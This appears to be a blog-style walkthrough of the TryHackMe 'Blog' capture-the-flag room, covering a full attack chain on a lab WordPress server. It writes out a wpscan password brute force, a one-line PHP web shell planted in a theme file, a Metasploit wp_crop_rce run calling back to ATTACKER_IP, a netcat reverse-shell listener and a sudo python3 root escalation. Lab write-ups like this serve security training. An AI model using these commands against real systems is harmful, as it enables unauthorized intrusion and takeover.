π§ͺ TryHackMe β BLOG Room (Full Lab Walkthrough)
β οΈ Educational Use Only: This walkthrough is strictly for authorized
platforms like TryHackMe. Do not attempt on real-world systems.
π― Goal
- β Initial Access
- β User Flag
- β Root Flag
πΉ STEP 1: Start the Machine & Identify IP
Start the machine and note the assigned IP address.
ping Target IPexport IP=10.10.x.xπΉ STEP 2: Network Enumeration
nmap -sC -sV -oN nmap.txt $IPExpected Open Ports:
- 22/tcp β SSH
- 80/tcp β HTTP
π‘ Web service on port 80 becomes the main attack surface.
πΉ STEP 3: Website Enumeration
Visit the website in a browser.
http://<IP>The site appears to be a WordPress blog.
πΉ STEP 4: Directory Bruteforce
gobuster dir -u http://$IP -w /usr/share/wordlists/dirb/common.txtImportant Directories:
- /wp-admin
- /wp-login.php
- /wp-content
β
WordPress CMS confirmed
πΉ STEP 5: WordPress User Enumeration
wpscan --url http://$IP --enumerate u- Discovered User: admin
πΉ STEP 6: WordPress Password Bruteforce
wpscan --url http://$IP \
--usernames admin \
--passwords /usr/share/wordlists/rockyou.txt
π¨ Credentials Found: admin : <password>
πΉ STEP 7: Login to WordPress Admin Panel
http://<IP>/wp-adminπΉ STEP 8 (Option A): Remote Code Execution (Theme Editor)
Navigate to Appearance β Theme Editor β 404.php
<
?php
system(\$_GET['cmd']);
?>
OR
πΉ STEP 8 (Option B): Exploitation Using Metasploit
Instead of manual exploitation, Metasploit can be used to gain an initial shell.
β οΈ This method is optional and shown for learning purposes only.
msfconsole
use exploit/multi/http/wp_crop_rce
# Target machine IP (victim)
set RHOSTS <TARGET_IP>
# WordPress credentials
set USERNAME admin
set PASSWORD <password>
# Attacker machine IP (your system / VPN IP)
set LHOST <ATTACKER_IP>
run
πΉ After Exploitation: Get a Stable Shell
sessionssessions -i 1shellbash -ipython -c 'import pty; pty.spawn("/bin/bash")'or simply:
bash -iwhoami
π‘ Successful exploitation results in a Meterpreter shell,
which can then be converted to a standard system shell.
πΉ STEP 9: Obtain Reverse Shell
nc -lvnp 4444Trigger the payload from the browser.
π Shell obtained as www-data
πΉ STEP 10: Stabilize Shell
# Spawn a proper TTY shell
python3 -c 'import pty; pty.spawn("/bin/bash")'
# Fix terminal display issues
export TERM=xterm
πΉ STEP 11: Capture User Flag
cd /home
ls
cd <user>
cat user.txt
β
User Flag Captured
πΉ STEP 12: Privilege Escalation Enumeration
sudo -l
π‘ NOPASSWD permission on python3 detected.
πΉ STEP 13: Root Access
sudo python3 -c 'import os; os.system("/bin/bash")'
whoami
πΉ STEP 14: Capture Root Flag
cd /root
cat root.txt
π― Root Flag Captured
π§Ύ Key Takeaways
- β Enumeration is critical
- β Weak credentials enable compromise
- β Misconfigured sudo leads to root access
- β Defense relies on patching and hardening
β
This lab demonstrates a full real-world attack chain in a controlled environment.
